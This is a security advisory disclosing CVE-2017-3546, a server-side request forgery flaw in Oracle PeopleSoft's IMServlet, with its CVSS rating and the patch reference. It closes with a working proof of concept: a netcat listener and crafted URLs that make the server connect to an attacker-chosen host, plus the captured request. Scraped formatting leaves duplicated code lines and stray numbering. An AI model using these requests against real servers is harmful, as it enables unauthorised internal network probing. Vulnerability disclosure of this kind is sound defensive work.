Application: Oracle PeopleSoft **Versions Affected:**ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55; PeopleSoft HCM 9.2 Vendor:Oracle **Bugs:**SSRF **Reported:**23.12.2016 **Vendor response:**24.12.2016 **Date of Public Advisory:**18.04.2017 **Reference: **Oracle CPU April 2017 Authors: Roman Shalymov (ERPScan)
Class: SSRF
Impact: cross-site port attack, service enumeration
Remotely Exploitable: yes
Locally Exploitable: yes
CVE: CVE-2017-3546
CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | Low (L) |
I: Impact to Integrity | Low (L) |
A: Impact to Availability | None (N) |
An attacker can force a vulnerable server to trigger malicious requests to third-party servers and/or to internal resources. This vulnerability can then be leveraged to launch specific attacks such as cross-site port attack, service enumeration, and various other attacks.
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
To correct this vulnerability, implement Oracle CPU April 2017
1. nc -l -p # on some host
1
|
—|—
In browser
http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT http://PPLSOFTSRV::8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23"
1
2
|
http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT
http://PPLSOFTSRV::8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23"
—|—
Response in netcat
GET /?param=var HTTP/1.1 User-Agent: Java1.7.0_95 Host: SOMEHOST:OPEN_PORT Accept: text/html, image/gif, image/jpeg, /; q=.2 Connection: Keep-Alive
1
2
3
4
5
|
GET /?param=var HTTP/1.1
User-Agent: Java1.7.0_95
Host: SOMEHOST:OPEN_PORT
Accept: text/html, image/gif, image/jpeg, /; q=.2
Connection: Keep-Alive
—|—